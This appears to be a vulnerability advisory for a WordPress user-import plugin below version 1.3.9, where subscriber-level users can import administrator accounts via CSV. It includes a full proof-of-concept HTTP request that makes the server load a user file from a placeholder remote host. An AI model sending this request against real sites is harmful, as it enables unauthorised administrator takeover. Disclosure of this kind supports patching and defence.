“The flaw allowed anybody with subscriber-level access or above to import new users via a CSV file, including administrative-level users” providing subscriber-level users and above with the ability to escalate their privileges.
POST /wp-admin/admin-ajax.php?import_page=wordpress_hf_user_csv&step;=3 HTTP/1.1 Host: EXAMPLE.com Accept: / X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36 Origin: http://EXAMPLE.com Referer: http://EXAMPLE.com/wp-admin/admin.php?import=wordpress_hf_user_csv&step;=2 Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: {SUB+ COOKIES} Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 133 action=user_csv_import_request&file;=http://REMOTESITE.com/USERS.csv&start;_pos=0&end;_pos= PoC video: https://www.youtube.com/watch?v=0ejJwbFJpcU
CPE | Name | Operator | Version |
---|---|---|---|
users-customers-import-export-for-wp-woocommerce | lt | 1.3.9 |